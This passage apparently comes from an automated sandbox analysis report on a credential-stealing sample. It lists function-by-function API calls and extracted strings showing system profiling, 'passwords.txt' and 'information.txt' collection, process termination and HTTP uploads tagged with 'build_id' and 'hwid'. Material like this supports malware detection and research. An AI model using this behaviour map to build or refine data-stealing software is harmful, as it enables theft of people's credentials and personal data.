                                                                                                                                                                                                  • Part of subcall function 0040F3ED: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F418
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: ReleaseDC.USER32(00000000,00000000), ref: 0040F423
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?), ref: 0040F42F
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?,00000000), ref: 0040F436
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: wsprintfA.USER32 ref: 0040F448
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: _EH_prolog.MSVCRT ref: 0040ECD9
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: GetKeyboardLayoutList.USER32(00000000,00000000,004251F7,00000000,?,00000000), ref: 0040ED0B
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040ED19
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040ED24
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040ED4E
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: LocalFree.KERNEL32(?), ref: 0040EDF2
                                                                                                                                                                                                  • Part of subcall function 0040EC81: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ), ref: 0040EC92
                                                                                                                                                                                                  • Part of subcall function 0040EC81: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040EC99
                                                                                                                                                                                                  • Part of subcall function 0040EC81: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040ECA8
                                                                                                                                                                                                  • Part of subcall function 0040EC81: wsprintfA.USER32 ref: 0040ECC6
                                                                                                                                                                                                  • Part of subcall function 0040EE07: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C), ref: 0040EE1B
                                                                                                                                                                                                  • Part of subcall function 0040EE07: HeapAlloc.KERNEL32(00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C,00000000,?), ref: 0040EE22
                                                                                                                                                                                                  • Part of subcall function 0040EE07: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EE40
                                                                                                                                                                                                  • Part of subcall function 0040EE07: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EE5C
                                                                                                                                                                                                  • Part of subcall function 0040EEA3: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040EEF6
                                                                                                                                                                                                  • Part of subcall function 0040EEA3: wsprintfA.USER32 ref: 0040EF3C
                                                                                                                                                                                                  • Part of subcall function 0040EE70: GetSystemInfo.KERNEL32(00000000), ref: 0040EE7D
                                                                                                                                                                                                  • Part of subcall function 0040EE70: wsprintfA.USER32 ref: 0040EE92
                                                                                                                                                                                                  • Part of subcall function 0040EF70: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040EF7E
                                                                                                                                                                                                  • Part of subcall function 0040EF70: HeapAlloc.KERNEL32(00000000), ref: 0040EF85
                                                                                                                                                                                                  • Part of subcall function 0040EF70: GlobalMemoryStatusEx.KERNEL32 ref: 0040EFA5
                                                                                                                                                                                                  • Part of subcall function 0040EF70: wsprintfA.USER32 ref: 0040EFCB
                                                                                                                                                                                                  • Part of subcall function 0040EFD9: _EH_prolog.MSVCRT ref: 0040EFDE
                                                                                                                                                                                                  • Part of subcall function 0040EFD9: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040F09F
                                                                                                                                                                                                  • Part of subcall function 0040F310: _EH_prolog.MSVCRT ref: 0040F315
                                                                                                                                                                                                  • Part of subcall function 0040F310: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F350
                                                                                                                                                                                                  • Part of subcall function 0040F310: Process32First.KERNEL32(00000000,00000128), ref: 0040F361
                                                                                                                                                                                                  • Part of subcall function 0040F310: Process32Next.KERNEL32(?,00000128), ref: 0040F3C9
                                                                                                                                                                                                  • Part of subcall function 0040F310: CloseHandle.KERNEL32(?,?,00000000), ref: 0040F3D6
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: _EH_prolog.MSVCRT ref: 0040F0C3
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042520F,00000000,00000000), ref: 0040F10B
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040F155
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: wsprintfA.USER32 ref: 0040F17F
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040F19C
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040F1C6
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: lstrlenA.KERNEL32(?), ref: 0040F1DB
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00425240), ref: 0040F25B
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00425684,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00425674), ref: 004143E6
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $V$Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                • API String ID: 722754166-310184570
                                                                                                                                                                                                • Opcode ID: 7f2e4029aff92c5e2c240fd50370c5247bd4e9c05f8058d29db4e94fbe2e0986
                                                                                                                                                                                                • Instruction ID: 8c1396adf68247569608152dff41ae6f6d2696e793e5c6152f52b5d6a5d56ecc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f2e4029aff92c5e2c240fd50370c5247bd4e9c05f8058d29db4e94fbe2e0986
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FA252B1804148E9CB05E7E2C556FEEBB786F25308F5049AFA542731C2DF781B58CAB6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040B307
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00424BA4,?,?,?,00424B9E,?,00000000), ref: 0040B3FF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040B460
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 0040B467
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000), ref: 0040B4F7
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B50E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B520
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BA8), ref: 0040B52E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B540
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BAC), ref: 0040B54E
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B55D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B56F
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BB0), ref: 0040B57D
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B58C
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B59E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BB4), ref: 0040B5AC
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040B5BB
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040B5CD
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BB8), ref: 0040B5DB
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BBC), ref: 0040B5E9
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040B61D
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B670
                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040B69D
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                • String ID: passwords.txt
                                                                                                                                                                                                • API String ID: 3298853120-347816968
                                                                                                                                                                                                • Opcode ID: 65ab87aa7b56291ed90fd951f391f19540d8fa289d9be0b470e30e9bddc03eb4
                                                                                                                                                                                                • Instruction ID: ca72e83cddf771b3c86cf8916fbba1e6db8a1ff0d0e95ebd04ad23dcae455c32
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65ab87aa7b56291ed90fd951f391f19540d8fa289d9be0b470e30e9bddc03eb4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DC15871800118EADB05EBE1DD0AEEEBF75EF29304F10486AF512721E2DB791A18DB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041283F
                                                                                                                                                                                                  • Part of subcall function 004121C3: _EH_prolog.MSVCRT ref: 004121C8
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412A20
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412AB6
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00411F59: _EH_prolog.MSVCRT ref: 00411F5E
                                                                                                                                                                                                  • Part of subcall function 00411F59: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411FBC
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412BF7
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412C8D
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412DCE
                                                                                                                                                                                                  • Part of subcall function 00412046: _EH_prolog.MSVCRT ref: 0041204B
                                                                                                                                                                                                  • Part of subcall function 00412046: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004120CD
                                                                                                                                                                                                  • Part of subcall function 00412046: lstrlenA.KERNEL32(00000000), ref: 004120E4
                                                                                                                                                                                                  • Part of subcall function 00412046: StrStrA.SHLWAPI(00000000,00000000), ref: 0041210B
                                                                                                                                                                                                  • Part of subcall function 00412046: lstrlenA.KERNEL32(00000000), ref: 00412120
                                                                                                                                                                                                  • Part of subcall function 00412046: lstrlenA.KERNEL32(00000000), ref: 0041213B
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412E64
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FA5
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041303B
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041317C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041320C
                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 0041321B
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                                                                                                                                • String ID: "$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                • API String ID: 1345713276-2213018930
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00403B1C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BC7
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 00403BDE
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D66
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403DA0
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DC4
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004249CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 004040A0
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004040B9
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040CA
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040411E
                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404129
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040413E
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404147
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                • API String ID: 1139859944-3346224549
                                                                                                                                                                                                • Opcode ID: 15b485722b9c602a729ca5fa6ab806c4251012afa5fc40f7d4f12ac64c36a392
                                                                                                                                                                                                • Instruction ID: 127932786617c287c74a1cf09914acf07e266ab5e26ab2cbaf5a59b4efe1ea99
                                                                                                                                                                                                • Opcode Fuzzy Hash: 15b485722b9c602a729ca5fa6ab806c4251012afa5fc40f7d4f12ac64c36a392
                                                                                                                                                                                                • Instruction Fuzzy Hash: FC2270B1800148EADB01EBE2C956EEEBBB9AF19304F1044AEE541731C2DF781B58DB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00406788
                                                                                                                                                                                                  • Part of subcall function 0040EB17: StrCmpCA.SHLWAPI(?,?,?,004067AA,?,00000000), ref: 0040EB20
                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00424BD0,?,?,?,00424BA6,?,00000000), ref: 004068F4
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00410041: _EH_prolog.MSVCRT ref: 00410046
                                                                                                                                                                                                  • Part of subcall function 00410041: memset.MSVCRT ref: 00410068
                                                                                                                                                                                                  • Part of subcall function 00410041: OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 004100EF
                                                                                                                                                                                                  • Part of subcall function 00410041: TerminateProcess.KERNEL32(00000000,00000000), ref: 004100FD
                                                                                                                                                                                                  • Part of subcall function 00410041: CloseHandle.KERNEL32(00000000), ref: 00410104
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406AE6
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00406AED
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00406C0B
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BEC), ref: 00406C19
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00406C2B
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424BF0), ref: 00406C39
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00406D80
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00406D8E
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
